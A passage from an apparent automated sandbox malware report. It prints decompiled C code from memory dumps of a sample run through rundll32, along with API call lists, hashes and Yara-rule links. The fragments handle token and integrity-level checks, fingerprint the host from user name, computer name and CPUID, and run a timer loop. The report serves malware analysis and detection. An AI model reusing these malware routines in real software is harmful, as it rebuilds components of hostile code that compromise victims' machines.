                                                            • Part of subcall function 04C0A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04C05B2B,00000000,00000001,00000001,?,?,04C03E08,?,?,?,?,00000102), ref: 04C0A790
                                                            • Part of subcall function 04C0A782: StrChrA.SHLWAPI(?,0000003F,?,?,04C03E08,?,?,?,?,00000102,04C067B8,?,?,00000000,00000000), ref: 04C0A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04C03E08,?,?,?,?,00000102,04C067B8,?), ref: 04C05B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C05B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C05B77
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 5526a8a7008113243548ff09538346caad4e7ddf523b0b2897502016ddf672b6
                                                          • Instruction ID: 1526f288ceb4c6ccc0901b3045634922eb4b9b16e42d6fead794877b63258169
                                                          • Opcode Fuzzy Hash: 5526a8a7008113243548ff09538346caad4e7ddf523b0b2897502016ddf672b6
                                                          • Instruction Fuzzy Hash: 8E21D276504215FFDB12AF78C844AAA7FFAEF16288B05C154F9049F241E635FA00DBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C045C6, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04C045C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04C0A71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                          0x04c045db
                                                          0x04c045df
                                                          0x04c045e9
                                                          0x04c045ee
                                                          0x04c045f3
                                                          0x04c045f5
                                                          0x04c045fd
                                                          0x04c04602
                                                          0x04c04610
                                                          0x04c04615
                                                          0x04c0461f

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0688935C,?,04C08D93,004F0053,0688935C,?,?,?,?,?,?,04C0523E), ref: 04C045D6
                                                          • lstrlenW.KERNEL32(04C08D93,?,04C08D93,004F0053,0688935C,?,?,?,?,?,?,04C0523E), ref: 04C045DD
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,04C08D93,004F0053,0688935C,?,?,?,?,?,?,04C0523E), ref: 04C045FD
                                                          • memcpy.NTDLL(74B069A0,04C08D93,00000002,00000000,004F0053,74B069A0,?,?,04C08D93,004F0053,0688935C), ref: 04C04610
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 3ebbb150957f4aea3b7541b374f48abafccf18d69c93b171242bc0f6b19fe402
                                                          • Instruction ID: 31b32543247048632a830e4930a1d624941596ca8cfa6fe21bb1b7ba0e66d05c
                                                          • Opcode Fuzzy Hash: 3ebbb150957f4aea3b7541b374f48abafccf18d69c93b171242bc0f6b19fe402
                                                          • Instruction Fuzzy Hash: 8AF0F976900119BBDF11EFA9CC84C9F7BADEF092587158062EA04D7211E635EA149BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C0361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(06889A78,00000000,00000000,7742C740,04C020ED,00000000), ref: 04C0362A
                                                          • lstrlen.KERNEL32(?), ref: 04C03632
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • lstrcpy.KERNEL32(00000000,06889A78), ref: 04C03646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04C03651
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 5e8699d372c07b5a7aca55fe8268c5053b43826798e2b8a9d7089668bd026487
                                                          • Instruction ID: c9b3d565bbe45a80a777ee25ba5bc79553f8f9e511b220c1d0a4f0e8325eef36
                                                          • Opcode Fuzzy Hash: 5e8699d372c07b5a7aca55fe8268c5053b43826798e2b8a9d7089668bd026487
                                                          • Instruction Fuzzy Hash: 89E09237901221678711ABE8AC48D6BBBADEF996557054517F600D3110C7399D01CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: rundll32.exe PID: 5496 Parent PID: 1112 rundll32.exeCOMMON

                                                          Executed Functions

                                                          Function 04635A27, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E04635A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E0463A71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E0463A734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                          0x04635a34
                                                          0x04635a35
                                                          0x04635a36
                                                          0x04635a37
                                                          0x04635a38
                                                          0x04635a3c
                                                          0x04635a43
                                                          0x04635a52
                                                          0x04635a55
                                                          0x04635a58
                                                          0x04635a5f
                                                          0x04635a62
                                                          0x04635a65
                                                          0x04635a68
                                                          0x04635a6b
                                                          0x04635a76
                                                          0x04635a78
                                                          0x04635a81
                                                          0x04635a89
                                                          0x04635a8b
                                                          0x04635a9d
                                                          0x04635aa7
                                                          0x04635aab
                                                          0x04635aba
                                                          0x04635abe
                                                          0x04635ac7
                                                          0x04635acf
                                                          0x04635acf
                                                          0x04635ad1
                                                          0x04635ad1
                                                          0x04635ad9
                                                          0x04635adf
                                                          0x04635ae3
                                                          0x04635ae3
                                                          0x04635aee

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04635A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04635A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04635A9D
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04635ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04635AC7
                                                          • NtClose.NTDLL(?), ref: 04635AD9
                                                          • NtClose.NTDLL(00000000), ref: 04635AE3
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 0c0770be73e892d5a0957d360dc22ac9692808c57dc7e84100e7e2bb39298bf5
                                                          • Instruction ID: 5937c8a7995d4d55446a2b503082ef7139b486fbb3c84c4323af41d4bce62868
                                                          • Opcode Fuzzy Hash: 0c0770be73e892d5a0957d360dc22ac9692808c57dc7e84100e7e2bb39298bf5
                                                          • Instruction Fuzzy Hash: 44211672900258BBDB01AFA5CC84ADEBFBDEF08741F105026F902F6110E7769A44ABA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046351B0, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E046351B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x463d240);
					_v20 = 0;
					_v16 = 0;
					L0463AF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x463d26c; // 0x324
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x463d24c = 5;
						} else {
							_t68 = E04638D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x463d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E0463A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E046336B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x463d244);
							goto L21;
						} else {
							__eflags =  *0x463d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04636761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x463d248);
								L21:
								L0463AF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x463d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                          0x046351b0
                                                          0x046351c2
                                                          0x046351c5
                                                          0x046351d1
                                                          0x046351d7
                                                          0x046351dc
                                                          0x04635343
                                                          0x046351e2
                                                          0x046351e2
                                                          0x046351e4
                                                          0x046351e9
                                                          0x046351ea
                                                          0x046351f0
                                                          0x046351f3
                                                          0x046351f6
                                                          0x04635204
                                                          0x0463520f
                                                          0x04635212
                                                          0x04635214
                                                          0x04635221
                                                          0x0463522b
                                                          0x0463522d
                                                          0x04635232
                                                          0x04635237
                                                          0x04635242
                                                          0x04635242
                                                          0x04635239
                                                          0x04635239
                                                          0x04635240
                                                          0x00000000
                                                          0x00000000
                                                          0x04635240
                                                          0x0463524c
                                                          0x00000000
                                                          0x0463524f
                                                          0x04635253
                                                          0x0463525e
                                                          0x0463525e
                                                          0x04635265
                                                          0x0463526e
                                                          0x04635275
                                                          0x0463527e
                                                          0x04635281
                                                          0x04635284
                                                          0x04635289
                                                          0x0463528e
                                                          0x00000000
                                                          0x00000000
                                                          0x04635290
                                                          0x04635293
                                                          0x04635296
                                                          0x04635299
                                                          0x00000000
                                                          0x0463529b
                                                          0x046352aa
                                                          0x046352aa
                                                          0x00000000
                                                          0x046352d8
                                                          0x046352d8
                                                          0x046352dd
                                                          0x046352fc
                                                          0x046352fe
                                                          0x04635303
                                                          0x04635304
                                                          0x00000000
                                                          0x046352df
                                                          0x046352df
                                                          0x046352e5
                                                          0x00000000
                                                          0x046352e7
                                                          0x046352e7
                                                          0x046352ec
                                                          0x046352ee
                                                          0x046352f3
                                                          0x046352f4
                                                          0x0463530a
                                                          0x0463530a
                                                          0x04635312
                                                          0x0463531d
                                                          0x04635320
                                                          0x0463532b
                                                          0x0463532d
                                                          0x04635330
                                                          0x04635332
                                                          0x00000000
                                                          0x04635338
                                                          0x00000000
                                                          0x04635338
                                                          0x04635332
                                                          0x046352e5
                                                          0x00000000
                                                          0x046352dd
                                                          0x046352ad
                                                          0x046352af
                                                          0x046352b2
                                                          0x046352b3
                                                          0x046352b3
                                                          0x046352b7
                                                          0x046352c1
                                                          0x046352c1
                                                          0x046352c7
                                                          0x046352ca
                                                          0x046352ca
                                                          0x046352d0
                                                          0x046352d0
                                                          0x0463534d
                                                          0x00000000

                                                          APIs
                                                          • memset.NTDLL ref: 046351C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 046351D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 046351F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04635212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0463522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 046352C1
                                                          • CloseHandle.KERNEL32(?), ref: 046352D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0463530A
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04635D5E,?), ref: 04635320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0463532B
                                                            • Part of subcall function 04638D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04EC93A0,?,00000000,30314549,00000014,004F0053,04EC935C), ref: 04638E00
                                                            • Part of subcall function 04638D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0463523E), ref: 04638E12
                                                          • GetLastError.KERNEL32 ref: 0463533D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: d42cdcb9772fbdfc747a9d3795ab5fcc2a699c54c261305de21b7b1af5e1320b
                                                          • Instruction ID: 337a2f11b9f69f83c07c03d67e5e9170cb6372388c16cabb9c6c4a4421e2c047
                                                          • Opcode Fuzzy Hash: d42cdcb9772fbdfc747a9d3795ab5fcc2a699c54c261305de21b7b1af5e1320b
                                                          • Instruction Fuzzy Hash: 71514D719012A8BBDB11DF95DC44DEEBFB8EF49726F204215F911B3250E774AA44CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0463232F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E0463232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0463AF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x463d2a8; // 0x88a5a8
				_t5 = _t13 + 0x463e87e; // 0x4ec8e26
				_t6 = _t13 + 0x463e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0463ABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x463d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                          0x0463232f
                                                          0x04632337
                                                          0x0463233b
                                                          0x04632341
                                                          0x04632346
                                                          0x0463234b
                                                          0x0463234e
                                                          0x04632351
                                                          0x04632356
                                                          0x04632357
                                                          0x0463235a
                                                          0x0463235f
                                                          0x04632366
                                                          0x04632370
                                                          0x04632372
                                                          0x04632373
                                                          0x04632376
                                                          0x04632392
                                                          0x04632398
                                                          0x0463239c
                                                          0x046323ea
                                                          0x0463239e
                                                          0x046323ab
                                                          0x046323bb
                                                          0x046323c3
                                                          0x046323d5
                                                          0x046323d9
                                                          0x00000000
                                                          0x00000000
                                                          0x046323c5
                                                          0x046323c8
                                                          0x046323cd
                                                          0x046323cf
                                                          0x046323cf
                                                          0x046323ad
                                                          0x046323af
                                                          0x046323db
                                                          0x046323dc
                                                          0x046323dc
                                                          0x046323ab
                                                          0x046323f1

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04635C31,?,?,4D283A53,?,?), ref: 0463233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04632351
                                                          • _snwprintf.NTDLL ref: 04632376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,0463D2AC,00000004,00000000,00001000,?), ref: 04632392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04635C31,?,?,4D283A53), ref: 046323A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 046323BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04635C31,?,?), ref: 046323DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04635C31,?,?,4D283A53), ref: 046323E4
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 37ab34862b0ddc60ad84c14691cecf64dabec1292da327a956a4384c92fbc9fa
                                                          • Instruction ID: d236c640ef3ca3d796b6146d246b8c4a87bef919056ffbed7cf8a857eac434d3
                                                          • Opcode Fuzzy Hash: 37ab34862b0ddc60ad84c14691cecf64dabec1292da327a956a4384c92fbc9fa
                                                          • Instruction Fuzzy Hash: E521C073600284BBE711ABA4CC45F8E37A9EB58712F100165F605E7290FB71AD058B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04639135, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E04639135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x463d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E0463A6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x463d2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x463d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04637306(_v8 + _v8, _t64);
							}
							HeapFree( *0x463d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x463d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04637306(_v8 + _v8, _t64);
						}
						HeapFree( *0x463d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                          0x04639135
                                                          0x0463913d
                                                          0x04639141
                                                          0x04639144
                                                          0x04639149
                                                          0x0463914b
                                                          0x04639150
                                                          0x04639150
                                                          0x04639156
                                                          0x04639158
                                                          0x04639165
                                                          0x046391c6
                                                          0x04639167
                                                          0x0463916c
                                                          0x04639172
                                                          0x04639177
                                                          0x04639185
                                                          0x04639189
                                                          0x04639198
                                                          0x0463919f
                                                          0x046391a6
                                                          0x046391a6
                                                          0x046391b1
                                                          0x046391b1
                                                          0x04639189
                                                          0x04639177
                                                          0x046391c8
                                                          0x046391ce
                                                          0x046391d8
                                                          0x046391da
                                                          0x046391df
                                                          0x046391ee
                                                          0x046391f2
                                                          0x046391fd
                                                          0x04639204
                                                          0x0463920b
                                                          0x0463920b
                                                          0x04639217
                                                          0x04639217
                                                          0x046391f2
                                                          0x04639222
                                                          0x04639224
                                                          0x04639227
                                                          0x04639229
                                                          0x0463922c
                                                          0x0463922f
                                                          0x04639239
                                                          0x0463923d
                                                          0x04639241

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0463916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04639183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04639190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04635D20), ref: 046391B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 046391D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046391EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 046391F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04635D20), ref: 04639217
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: eeb8df7076ebafc6751631758a900ad3c701894aec6a88402faf936660b1e9a0
                                                          • Instruction ID: f730304f0a2f75d48075b61ce48137b80674e62e2caae5bc4247a203171bd9e9
                                                          • Opcode Fuzzy Hash: eeb8df7076ebafc6751631758a900ad3c701894aec6a88402faf936660b1e9a0
                                                          • Instruction Fuzzy Hash: CE3139B2A00285EFEB10DFA8DD84AAEB7F9EF54302F114469E505E7250E774EE059F10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04631A08, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04631A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x463d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E0463A71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E0463A734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                          0x04631a15
                                                          0x04631a1c
                                                          0x04631a23
                                                          0x04631a37
                                                          0x04631a42
                                                          0x04631a5a
                                                          0x04631a67
                                                          0x04631a6a
                                                          0x04631a6f
                                                          0x04631a7a
                                                          0x04631a7e
                                                          0x04631a8d
                                                          0x04631a91
                                                          0x04631aad
                                                          0x04631aad
                                                          0x04631ab1
                                                          0x04631ab1
                                                          0x04631ab6
                                                          0x04631aba
                                                          0x04631ac0
                                                          0x04631ac1
                                                          0x04631ac8
                                                          0x04631ace

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04631A3A
